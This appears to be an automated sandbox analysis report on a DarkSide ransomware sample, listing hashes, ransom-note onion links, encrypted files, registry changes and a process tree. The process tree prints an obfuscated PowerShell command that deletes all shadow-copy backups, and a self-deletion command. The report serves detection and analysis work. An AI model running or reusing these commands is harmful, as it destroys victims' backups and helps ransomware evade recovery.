Analysis
-
max time kernel
106s -
max time network
105s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
02-06-2023 20:47
Static task
static1
Behavioral task
behavioral1
Sample
Darkside.exe
Resource
win7-20230220-en
General
-
Target
Darkside.exe
-
Size
59KB
-
MD5
cfcfb68901ffe513e9f0d76b17d02f96
-
SHA1
766b30e5a37d1bc8d8fe5c7cacc314504a44ac1f
-
SHA256
17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61
-
SHA512
0d26fa9478f4626107e38c570d1bae1049b744181cf0395d95fb07675575ca393d88d4783bf31bdf11bef1da5648a5a53a6d95b21492f96b4de35c0ec323ae0c
-
SSDEEP
768:9jjV7Iax7F3DS4/S96/P3rsAc4ci5pwwX5+R4VYY23W5:vx7Fu4/i6/P3rlckx5+R4VDZ5
Malware Config
Extracted
C:\Users\Admin\README.e0af32e7.TXT
darkside
http://darksidedxcftmqa.onion/polifilm/AWeu5Sv7zTTCTjZD8YkgoPRznfE5r7G-vbsXok9EvfiaNL_eDwRlgRMruMHisnEF
http://darksidfqzcuhtk2.onion/2AHUVJ3VGS97NUG5J5EYMQM5PJO77V9V0GDT3UYIJGFZUTOQRLUX593CQ2EZ2ZEH
Signatures
-
DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
-
Renames multiple (176) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Modifies extensions of user files 12 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
Darkside.exedescription ioc process File renamed C:\Users\Admin\Pictures\HideAdd.png => C:\Users\Admin\Pictures\HideAdd.png.e0af32e7 Darkside.exe File renamed C:\Users\Admin\Pictures\JoinResolve.png => C:\Users\Admin\Pictures\JoinResolve.png.e0af32e7 Darkside.exe File opened for modification C:\Users\Admin\Pictures\JoinResolve.png.e0af32e7 Darkside.exe File renamed C:\Users\Admin\Pictures\ShowExpand.tiff => C:\Users\Admin\Pictures\ShowExpand.tiff.e0af32e7 Darkside.exe File opened for modification C:\Users\Admin\Pictures\SearchClose.tiff.e0af32e7 Darkside.exe File opened for modification C:\Users\Admin\Pictures\ShowExpand.tiff Darkside.exe File opened for modification C:\Users\Admin\Pictures\ShowExpand.tiff.e0af32e7 Darkside.exe File renamed C:\Users\Admin\Pictures\ExitFind.tif => C:\Users\Admin\Pictures\ExitFind.tif.e0af32e7 Darkside.exe File opened for modification C:\Users\Admin\Pictures\ExitFind.tif.e0af32e7 Darkside.exe File opened for modification C:\Users\Admin\Pictures\HideAdd.png.e0af32e7 Darkside.exe File opened for modification C:\Users\Admin\Pictures\SearchClose.tiff Darkside.exe File renamed C:\Users\Admin\Pictures\SearchClose.tiff => C:\Users\Admin\Pictures\SearchClose.tiff.e0af32e7 Darkside.exe -
Deletes itself 1 IoCs
Processes:
cmd.exepid process 3356 cmd.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
Processes:
Darkside.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\e0af32e7.BMP" Darkside.exe Set value (str) \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\e0af32e7.BMP" Darkside.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
Darkside.exepid process 1236 Darkside.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies Control Panel 1 IoCs
Processes:
Darkside.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Control Panel\Desktop\WallpaperStyle = "10" Darkside.exe -
Modifies registry class 5 IoCs
Processes:
Darkside.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\e0af32e7\DefaultIcon Darkside.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\e0af32e7 Darkside.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\e0af32e7\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\e0af32e7.ico" Darkside.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.e0af32e7 Darkside.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.e0af32e7\ = "e0af32e7" Darkside.exe -
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
NOTEPAD.EXEpid process 3324 NOTEPAD.EXE -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exeDarkside.exepid process 1772 powershell.exe 1236 Darkside.exe 1236 Darkside.exe -
Suspicious use of AdjustPrivilegeToken 28 IoCs
Processes:
Darkside.exeAUDIODG.EXEpowershell.exevssvc.exedescription pid process Token: SeIncreaseQuotaPrivilege 1236 Darkside.exe Token: SeSecurityPrivilege 1236 Darkside.exe Token: SeTakeOwnershipPrivilege 1236 Darkside.exe Token: SeLoadDriverPrivilege 1236 Darkside.exe Token: SeSystemProfilePrivilege 1236 Darkside.exe Token: SeSystemtimePrivilege 1236 Darkside.exe Token: SeProfSingleProcessPrivilege 1236 Darkside.exe Token: SeIncBasePriorityPrivilege 1236 Darkside.exe Token: SeCreatePagefilePrivilege 1236 Darkside.exe Token: SeBackupPrivilege 1236 Darkside.exe Token: SeRestorePrivilege 1236 Darkside.exe Token: SeShutdownPrivilege 1236 Darkside.exe Token: SeDebugPrivilege 1236 Darkside.exe Token: SeSystemEnvironmentPrivilege 1236 Darkside.exe Token: SeRemoteShutdownPrivilege 1236 Darkside.exe Token: SeUndockPrivilege 1236 Darkside.exe Token: SeManageVolumePrivilege 1236 Darkside.exe Token: 33 1236 Darkside.exe Token: 34 1236 Darkside.exe Token: 35 1236 Darkside.exe Token: 33 1988 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 1988 AUDIODG.EXE Token: 33 1988 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 1988 AUDIODG.EXE Token: SeDebugPrivilege 1772 powershell.exe Token: SeBackupPrivilege 1596 vssvc.exe Token: SeRestorePrivilege 1596 vssvc.exe Token: SeAuditPrivilege 1596 vssvc.exe -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
Darkside.exedescription pid process target process PID 1236 wrote to memory of 1772 1236 Darkside.exe powershell.exe PID 1236 wrote to memory of 1772 1236 Darkside.exe powershell.exe PID 1236 wrote to memory of 1772 1236 Darkside.exe powershell.exe PID 1236 wrote to memory of 1772 1236 Darkside.exe powershell.exe PID 1236 wrote to memory of 3356 1236 Darkside.exe cmd.exe PID 1236 wrote to memory of 3356 1236 Darkside.exe cmd.exe PID 1236 wrote to memory of 3356 1236 Darkside.exe cmd.exe PID 1236 wrote to memory of 3356 1236 Darkside.exe cmd.exe -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\Darkside.exe"C:\Users\Admin\AppData\Local\Temp\Darkside.exe"1⤵
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies Control Panel
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C DEL /F /Q C:\Users\Admin\AppData\Local\Temp\Darkside.exe >> NUL2⤵
- Deletes itself
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}1⤵
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x4741⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\README.e0af32e7.TXT1⤵
- Opens file in notepad (likely ransom note)
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD5ad3087129db3fd435b37801111e58cba
SHA125c412c5a85078f097b705403da140b73f3779c3
SHA25678b71279e9ef84666054c3f703faf70d6e82aea0cbb365a78a5fb37eeedccefc
SHA5121a55e2faf6393da69ae3924cd86d8097959981474edd02982a987c05397e369ceb4ceed3c9f049af69ca52c565821932ddbeee2869fe50a445d2f362c9039a42
-
C:\Users\Admin\Desktop\README.e0af32e7.TXTFilesize
3KB
MD5b58e2411168bbdbec635cf4001635db0
SHA1c130cd9caaaa514a6b98c1168e10d44a989d191a
SHA256652a74736e10402013fae584c967fc5ea3b7c2eac0a436d41759963b3d42e37a
SHA51287e2c3ecf3805a7b3945eed4472548a63cbaee7c004c3bce220524e1c6733b3eb780812b4d336f6b72a365c161c02e18b8101e405d00507ff902e88dd49ba30a
-
C:\Users\Admin\README.e0af32e7.TXTFilesize
3KB
MD5b58e2411168bbdbec635cf4001635db0
SHA1c130cd9caaaa514a6b98c1168e10d44a989d191a
SHA256652a74736e10402013fae584c967fc5ea3b7c2eac0a436d41759963b3d42e37a
SHA51287e2c3ecf3805a7b3945eed4472548a63cbaee7c004c3bce220524e1c6733b3eb780812b4d336f6b72a365c161c02e18b8101e405d00507ff902e88dd49ba30a
-
memory/1772-59-0x000000001B2E0000-0x000000001B5C2000-memory.dmpFilesize
2.9MB
-
memory/1772-60-0x0000000002460000-0x0000000002468000-memory.dmpFilesize
32KB
-
memory/1772-61-0x0000000002990000-0x0000000002A10000-memory.dmpFilesize
512KB
-
memory/1772-62-0x0000000002990000-0x0000000002A10000-memory.dmpFilesize
512KB
-
memory/1772-63-0x0000000002990000-0x0000000002A10000-memory.dmpFilesize
512KB